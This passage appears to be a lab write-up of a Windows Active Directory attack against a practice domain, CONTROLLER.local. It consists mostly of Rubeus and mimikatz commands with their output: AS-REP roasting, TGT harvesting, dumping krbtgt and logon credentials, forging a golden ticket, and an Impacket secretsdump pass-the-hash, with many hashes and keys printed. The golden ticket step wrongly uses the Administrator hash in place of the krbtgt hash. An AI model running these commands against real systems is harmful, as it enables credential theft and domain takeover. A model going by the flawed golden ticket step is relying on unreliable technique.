                             3EDE8714A0554B895AE82C4E44D562521DC9B458CB699AC2F1AADF6936F8BB8B49723B589342E76D
                             B978E9165A4A7A9CA278324419C63AD550D57548AC5D1C2512B81B3398F73FD0BF8C35CBD5C9745A
                             93DF7BBE1D0A53E0283969AFCED8CFD25C52013DA96F2BA44E59DB26467C67569715822BD048B3DE
                             E0AFAFBD0D0BAE04FB2E7A44BCDB1D35A237A8AB5692C17FDC950E5585B80903E6206A1A2E3A762C
                             4C508F6C42D29F026EAB5F7CB83CB08A36B3FC9ACAC10D080DFAE3EE51E0F4A9A174A3E7954BF704
 
PS C:\Users\Administrator\Downloads> .\Rubeus.exe asreproast
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain          : CONTROLLER.local
[*] Searching path ‘LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local’ for AS-REP roastable users
[*] SamAccountName         : Admin2
[*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::28a4:b77a:1a94:1a81%5)
[*] Building AS-REQ (w/o preauth) for: ‘CONTROLLER.local\Admin2’
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
      $krb5asrep$Admin2@CONTROLLER.local:BC27761FDD4C8C65BB216EBA227043C8$65758FD850AC
      136E201CC2609B25332AE6215660A0387AF4A674AF0865F9643DD0BCBCF3A86EB9F4142D67A6BD20
      07D4266F40EC4B328FB3910403CE6AD14829E445B4AA4437C70E881F35EF14E429AC24243632829B
      8293B726D68360F275F3909CF0CCEA8B1F16BCE154993A0781D9CCF07FE8518060A5CAEDD42E4DED
      7877E5897A27A6A24A6DED0DAC65609260907B2E23E52F0B9F98CC7B8FDDEE66E93E45DE2A222596
      6135CE4F238DECE35E75D45935EED1F04987C2350AF5E531B95D31947044519B0A14E7C0DED40F30
      C3489ABB100799DBED018DB56ED082BD4345DCB1B673EFE00B79D4EF4E999A1A6DB2303E2A21
[*] SamAccountName         : User3
[*] DistinguishedName      : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::28a4:b77a:1a94:1a81%5)
[*] Building AS-REQ (w/o preauth) for: ‘CONTROLLER.local\User3’
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
      $krb5asrep$User3@CONTROLLER.local:4FD41F84DABDC908AC41A4A65F2B5443$EFC834DA5F64C
      E92576083A105DC1725B03DB1FDDA483FA60F534FC569D05853B298E5C14E283E0D835DFEF802561
      FAC1CEE8D4A2BF9F239CC01A6CD9C98A1FB6C3B87B692E010523BCA6DAB3D7ABDA9C33E891ACBDD1
      DA6EA4FCCB2BAE7676E272DB808BF19DEB4447B9549CF92BF599082869071160C6E5A5E394958C81
      E673B46A390E6FD8BFBFED9C7294488983BAFC7E2DB8661B36DFA5C15C9C2EC8D6EED7617FC751F1
      BDFCCFB4420D01C919B5E64963CDACBD15038E4EF5D0056C0EAF9EBFEE39F48495F4BEA78A0E01BA
      402169884EA11BE9A5C9EB671FBEC1A6CCAE17F3213AD2788E6A106225519E8DBEBBB7D4B3E
PS C:\Users\Administrator\Downloads>

PS C:\Users\Administrator\Downloads> .\Rubeus.exe harvest /interval:30
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
[*] Action: TGT Harvesting (with auto-renewal)
[*] Monitoring every 30 seconds for new TGTs
[*] Displaying the working TGT cache every 30 seconds
[*] Refreshing TGT ticket cache (11/30/2025 7:18:02 AM)
  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL 
  StartTime             :  11/30/2025 6:27:09 AM
  EndTime               :  11/30/2025 4:27:09 PM
  RenewTill             :  12/7/2025 6:27:09 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :
<details> <summary>Click to view text output</summary>
    doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
    cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEnTYz8MZ5K/n2IlngQTubEppx/Elsd2sphB5
    Fs6yU2upldmfMOwP4LGVDeOGUEXBQT84v/O5RAvTC/eEEsAP2lkKaeR5v5fprDoFDUr7aXFFy4z7Ig6cfMzcdI21Bd3AtgZJcR32
    dzk1WkIaUbyk11SMlSn7u3uzp0MOwnbDyx4nkQGAKWuM+xK9Lggm0gGwmydoph5B2IYt6jgk1B57jc3tJRF1kjAeHVj9EdgBlXb8
    GUowtP25qIenGzkmjoMrIvh6/Zm1apKZpvp+uDS58GgCAE4ewSx4iYvExKXsaM+V05snPYpOC79hRn4YltI9pz98mZxFdYaV187F
    +mqfcs1k3Zw/qMPTcsC4vh+/ZUhTJ+6gw+jeNtX6p8pe3ed3PaRhU62xq2+iIRvwjTkv0RrrZK0SoILdPYA7dPPfKwPwx5HTXfpv
    v6UTrHvZF8RJbqYerYll72fyZ6tq5YnDhIRE+00oNH4tZFrH4lkd8WbaYLoeECMAdnegSsSXZehz0odFfcqa+L/nwmnH94lfl+6U
    Y1A7H3HcCIW7kfJSkdejLt6Ojy5u+Tf9uoKUsQn1GfT0bhaB8x9sTIWs7u1ZNulsZ1tC4U48DIQFLoqBlu+H6nTTsxzhKfuKdaH1
    dirt5vkb1Tz4iyTtVVAGRiFQXrf0SdHduZFw4hlzy9ff0ctfc/u5pErL6RGDs1qpcjTgpLjWERW5JpF7208pnmHI+nZHCZreKfUY
    jUQnQLA03VLznU3bYX7DnidkXBwMPlYxwX8x4Ouw+/3+mFyj+l1bojyqsz1Z4DyhqmMx3midxGIoZ746AkgApsyuVSP2gEVuLtVB
    3FRiZxBN5LZqBFHbHwljn8EYkz8fiCXeEzTyh2xHK2lErNIBxrDYy+O+AN4Os7U5exnRjh0KPHL2RL/mH9374x3r/uCkYUYaZ7z3
    F9HGLJKF51G97xvESO0nhlwuUfSzZUaUlqcHxX7GqDW14Boq9+0qLJueqT92jrqXJMCKaP/aS+N+5SUG1DS78UMJSQzmrL1sJB+T
    on2UQTKKbAy9JblkjeBxvNLlIbm9dXDhrJ7xQfjxn0kvGiwodAPudq4dW6DlvcwNKzjLchIWDo0twDv93kAcQ+A2sqQcFrsLkM3r
    tgpH2hhei4KU2bpafDomAO44/C2fv/el2IzNmPDFJUNvRpt3KMyzZFOb2eVPCMA6Fh9Ins8xjzq/g6a81xpnIreCvswn78KtXoYA
    g52bt0bAvFTjGFGKt0bPefFKGjuyXbyE+0J5XTz83kcQGSggI8xxiOFSdYzM0ZODFwMgiVgXgjphcQLe0R8nA3Uw1IWidUhlFG+e
    xpVks2pxv/+79pYfa38Vp1kVAIziWab3MqJdAshgCGIxxW/WZ7QStBujgfcwgfSgAwIBAKKB7ASB6X2B5jCB46CB4DCB3TCB2qAr
    MCmgAwIBEqEiBCCdDozvwvD3hbQkNwkYnXzXBJ6ZhteXhn9HAo9PLjbXj6ESGxBDT05UUk9MTEVSLkxPQ0FMohowGKADAgEBoREw
    DxsNQ09OVFJPTExFUi0xJKMHAwUAQOEAAKURGA8yMDI1MTEzMDE0MjcwOVqmERgPMjAyNTEyMDEwMDI3MDlapxEYDzIwMjUxMjA3
    MTQyNzA5WqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM
</details>
  1. Mimikatz.exe for Kerberos Attack (Internal)

Read more of Mimikatz?

Offesinve Password Extraction on Windows: Mimikatz (PEN-300) Part 2

Sulaiman

·

Sep 19

Offesinve Password Extraction on Windows: Mimikatz (PEN-300) Part 2

Mimikatz for PEN-300 Practices

We already have it:

PS C:\Users\Administrator\Downloads> dir
    Directory: C:\Users\Administrator\Downloads
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/25/2020   3:45 PM        1263880 mimikatz.exe
-a----        5/25/2020   3:14 PM         212480 Rubeus.exe
PS C:\Users\Administrator\Downloads> .\mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59              
 .## ^ ##.  “A La Vie, A L’Amour” - (oe.eo)                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                    
 ‘## v ##’       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  ‘#####’        > http://pingcastle.com / http://mysmartlogon.com   ***/ 
mimikatz # privilege::debug                                           
Privilege ‘20’ OK 
                  
mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6
<details> <summary>Click to view text output</summary>
 * WDigest
    01  d2e9aa3caa4509c3f11521c70539e4ad
    02  c9a868fc195308b03d72daa4a5a4ee47 
    03  171e066e448391c934d0681986f09ff4
    04  d2e9aa3caa4509c3f11521c70539e4ad
    05  c9a868fc195308b03d72daa4a5a4ee47
    06  41903264777c4392345816b7ecbf0885
    07  d2e9aa3caa4509c3f11521c70539e4ad
    08  9a01474aa116953e6db452bb5cd7dc49
    09  a8e9a6a41c9a6bf658094206b51a4ead
    10  8720ff9de506f647ad30f6967b8fe61e
    11  841061e45fdc428e3f10f69ec46a9c6d
    12  a8e9a6a41c9a6bf658094206b51a4ead
    13  89d0db1c4f5d63ef4bacca5369f79a55 
    14  841061e45fdc428e3f10f69ec46a9c6d
    15  a02ffdef87fc2a3969554c3f5465042a
    16  4ce3ef8eb619a101919eee6cc0f22060
    17  a7c3387ac2f0d6c6a37ee34aecf8e47e
    18  085f371533fc3860fdbf0c44148ae730
    19  265525114c2c3581340ddb00e018683b
    20  f5708f35889eee51a5fa0fb4ef337a9b
    21  bffaf3c4eba18fd4c845965b64fca8e2
    22  bffaf3c4eba18fd4c845965b64fca8e2
    23  3c10f0ae74f162c4b81bf2a463a344aa
    24  96141c5119871bfb2a29c7ea7f0facef
    25  f9e06fa832311bd00a07323980819074 
    26  99d1dd6629056af22d1aea639398825b
    27  919f61b2c84eb1ff8d49ddc7871ab9e0
    28  d5c266414ac9496e0e66ddcac2cbcc3b
    29  aae5e850f950ef83a371abda478e05db
</details>
 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 79bf07137a8a6b8f
 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033 
      aes128_hmac       (4096) : 88cc87377b02a885b84fe7050f336d9b
      des_cbc_md5       (4096) : 79bf07137a8a6b8f
 * NTLM-Strong-NTOWF
    Random Value : 4b9102d709aada4d56a27b6c3cd14223
mimikatz #
mimikatz # sekurlsa::logonpasswords 
<details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 60300 (00000000:0000eb8c)
Session           : Interactive from 1
User Name         : DWM-1 
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:33 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : da37f64c1fb8db05694e02c735b17960
         * SHA1     : d653e6e1d3dce10ca7b76552b59f8bc20046a96c
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local 
         * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f
6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 
27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9
 2b fd 0f c7 e7 6a 79 38 2c 93 4b
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CONTROLLER-1$
Domain            : CONTROLLER
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:31 AM
SID               : S-1-5-20 
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : controller-1$
         * Domain   : CONTROLLER.LOCAL
         * Password : (null)
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 32911 (00000000:0000808f) 
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:30 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : da37f64c1fb8db05694e02c735b17960
         * SHA1     : d653e6e1d3dce10ca7b76552b59f8bc20046a96c
        tspkg :
        wdigest :        
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local
         * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f
6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 
27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9
 2b fd 0f c7 e7 6a 79 38 2c 93 4b
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 30261 (00000000:00007635)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:20 AM 
SID               :
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 2839472 (00000000:002b53b0)
Session           : NetworkCleartext from 0
User Name         : Administrator 
Domain            : CONTROLLER
Logon Server      : CONTROLLER-1
Logon Time        : 11/30/2025 7:11:46 AM
SID               : S-1-5-21-432953485-3795405108-1502158860-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CONTROLLER
         * NTLM     : 2777b7fec870e04dda00cd7260f7bee6
         * SHA1     : bae5c6e0d089a87a81392648a12415c937464543
         * DPAPI    : 2e922246710597000d650ede45c50832
        tspkg :  
        wdigest :
         * Username : Administrator
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : CONTROLLER.LOCAL
         * Password : (null)
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 2838237 (00000000:002b4edd)
Session           : Service from 0
User Name         : sshd_3728
Domain            : VIRTUAL USERS
Logon Server      : (null)
Logon Time        : 11/30/2025 7:11:38 AM 
SID               : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-3728
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$ 
         * Domain   : CONTROLLER.local
         * Password : 68 1d 71 f6 ae 20 f3 00 16 cf 2e a8 f1 55 59 c7 31 bf e8 54 0e 1b 01 3b 4a 57 8e f2 98 eb 53 67 5a cc 16 5e a7 5d 0b 50 ac 05 46 80 04 d8 d0 bf f8 36 ec d1 17 eb 53 33 90 e4 3f ed 0b 4c e3 0b 4a 15 ea 05 93 cd 00 c
a 88 e3 e3 6e 13 dc ed 29 32 6d 92 7f 33 22 e7 e7 53 5e 5f 67 f6 08 48 98 bb 28 39 9f 6a 14 3b 40 96 a1 b3 d5 6d 5c c1 0c ef 34 06 24 24 6d 95 63 18 47 f1 fa 12 d1 d0 ae 1d 08 7c be be ea c1 36 6a 48 8f b2 88 8a 5a bb 20 45 0e 12 a4 a6 
1b b4 1d a4 29 9e 2c 8b 65 6a 98 7d b3 88 49 f1 66 2e 94 fe df 1d 38 71 41 23 2f 1c 34 c3 31 29 b4 3e 20 ab 86 df bd d4 5a f7 08 32 73 1b 3d 5b 7f b9 92 64 50 c3 61 33 87 39 75 3b 14 e0 c3 b6 5e 3c e6 4d b8 d2 6c 2a b5 ec f1 f1 e6 4f 62
 3e 9b 8d c5 95 d3 75 9b 98 96 32
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:33 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :        
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 60281 (00000000:0000eb79)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:33 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary 
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local
         * Password : 68 1d 71 f6 ae 20 f3 00 16 cf 2e a8 f1 55 59 c7 31 bf e8 54 0e 1b 01 3b 4a 57 8e f2 98 eb 53 67 5a cc 16 5e a7 5d 0b 50 ac 05 46 80 04 d8 d0 bf f8 36 ec d1 17 eb 53 33 90 e4 3f ed 0b 4c e3 0b 4a 15 ea 05 93 cd 00 c
a 88 e3 e3 6e 13 dc ed 29 32 6d 92 7f 33 22 e7 e7 53 5e 5f 67 f6 08 48 98 bb 28 39 9f 6a 14 3b 40 96 a1 b3 d5 6d 5c c1 0c ef 34 06 24 24 6d 95 63 18 47 f1 fa 12 d1 d0 ae 1d 08 7c be be ea c1 36 6a 48 8f b2 88 8a 5a bb 20 45 0e 12 a4 a6 
1b b4 1d a4 29 9e 2c 8b 65 6a 98 7d b3 88 49 f1 66 2e 94 fe df 1d 38 71 41 23 2f 1c 34 c3 31 29 b4 3e 20 ab 86 df bd d4 5a f7 08 32 73 1b 3d 5b 7f b9 92 64 50 c3 61 33 87 39 75 3b 14 e0 c3 b6 5e 3c e6 4d b8 d2 6c 2a b5 ec f1 f1 e6 4f 62
 3e 9b 8d c5 95 d3 75 9b 98 96 32
        ssp :
        credman :        
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 32822 (00000000:00008036)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:30 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : da37f64c1fb8db05694e02c735b17960
         * SHA1     : d653e6e1d3dce10ca7b76552b59f8bc20046a96c
        tspkg :
        wdigest :        
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local
         * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f
6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 
27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9
 2b fd 0f c7 e7 6a 79 38 2c 93 4b
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 32814 (00000000:0000802e)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:30 AM 
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local
         * Password : 68 1d 71 f6 ae 20 f3 00 16 cf 2e a8 f1 55 59 c7 31 bf e8 54 0e 1b 01 3b 4a 57 8e f2 98 eb 53 67 5a cc 16 5e a7 5d 0b 50 ac 05 46 80 04 d8 d0 bf f8 36 ec d1 17 eb 53 33 90 e4 3f ed 0b 4c e3 0b 4a 15 ea 05 93 cd 00 c
a 88 e3 e3 6e 13 dc ed 29 32 6d 92 7f 33 22 e7 e7 53 5e 5f 67 f6 08 48 98 bb 28 39 9f 6a 14 3b 40 96 a1 b3 d5 6d 5c c1 0c ef 34 06 24 24 6d 95 63 18 47 f1 fa 12 d1 d0 ae 1d 08 7c be be ea c1 36 6a 48 8f b2 88 8a 5a bb 20 45 0e 12 a4 a6 
1b b4 1d a4 29 9e 2c 8b 65 6a 98 7d b3 88 49 f1 66 2e 94 fe df 1d 38 71 41 23 2f 1c 34 c3 31 29 b4 3e 20 ab 86 df bd d4 5a f7 08 32 73 1b 3d 5b 7f b9 92 64 50 c3 61 33 87 39 75 3b 14 e0 c3 b6 5e 3c e6 4d b8 d2 6c 2a b5 ec f1 f1 e6 4f 62
 3e 9b 8d c5 95 d3 75 9b 98 96 32
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 32665 (00000000:00007f99)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:30 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * NTLM     : dac2964ed5aeb9543cec20bddd0d66bf
         * SHA1     : 6369fd6dc8e9098c8c6b1c89c00b7777e82c5d16 
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER.local
         * Password : 68 1d 71 f6 ae 20 f3 00 16 cf 2e a8 f1 55 59 c7 31 bf e8 54 0e 1b 01 3b 4a 57 8e f2 98 eb 53 67 5a cc 16 5e a7 5d 0b 50 ac 05 46 80 04 d8 d0 bf f8 36 ec d1 17 eb 53 33 90 e4 3f ed 0b 4c e3 0b 4a 15 ea 05 93 cd 00 c
a 88 e3 e3 6e 13 dc ed 29 32 6d 92 7f 33 22 e7 e7 53 5e 5f 67 f6 08 48 98 bb 28 39 9f 6a 14 3b 40 96 a1 b3 d5 6d 5c c1 0c ef 34 06 24 24 6d 95 63 18 47 f1 fa 12 d1 d0 ae 1d 08 7c be be ea c1 36 6a 48 8f b2 88 8a 5a bb 20 45 0e 12 a4 a6 
1b b4 1d a4 29 9e 2c 8b 65 6a 98 7d b3 88 49 f1 66 2e 94 fe df 1d 38 71 41 23 2f 1c 34 c3 31 29 b4 3e 20 ab 86 df bd d4 5a f7 08 32 73 1b 3d 5b 7f b9 92 64 50 c3 61 33 87 39 75 3b 14 e0 c3 b6 5e 3c e6 4d b8 d2 6c 2a b5 ec f1 f1 e6 4f 62
 3e 9b 8d c5 95 d3 75 9b 98 96 32
        ssp :
        credman :
</details> <details> <summary>Click to view text output</summary>
Authentication Id : 0 ; 999 (00000000:000003e7) 
Session           : UndefinedLogonType from 0
User Name         : CONTROLLER-1$
Domain            : CONTROLLER
Logon Server      : (null)
Logon Time        : 11/30/2025 6:26:19 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : CONTROLLER-1$
         * Domain   : CONTROLLER
         * Password : (null)
        kerberos :
         * Username : controller-1$
         * Domain   : CONTROLLER.LOCAL
         * Password : (null)
        ssp :    
        credman :
</details>
mimikatz #

Kerberos Golden Ticket Attack:

mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:2777b7fec870e04dda00cd7260f7bee6 /id:500 
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-432953485-3795405108-1502158860
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 2777b7fec870e04dda00cd7260f7bee6 - rc4_hmac_nt
Lifetime  : 11/30/2025 7:27:08 AM ; 11/28/2035 7:27:08 AM ; 11/28/2035 7:27:08 AM
-> Ticket : ticket.kirbi
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated 
Final Ticket Saved to file !
mimikatz #
2777b7fec870e04dda00cd7260f7bee6
mimikatz # misc::cmd 
Patch OK for ‘cmd.exe’ from ‘DisableCMD’ to ‘KiwiAndCMD’ @ 00007FF7E85343B8

That’s for most kerberos attack case for PEN-200, moreover it’s coming if I missed something.

┌──(kali㉿kali)-[~]
└─$ secretsdump.py Administrator@10.48.184.32 -hashes :2777b7fec870e04dda00cd7260f7bee6
Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies 
<details> <summary>Click to view text output</summary>
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3793e46f2ffcf19c9060c058e1a8c4d7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
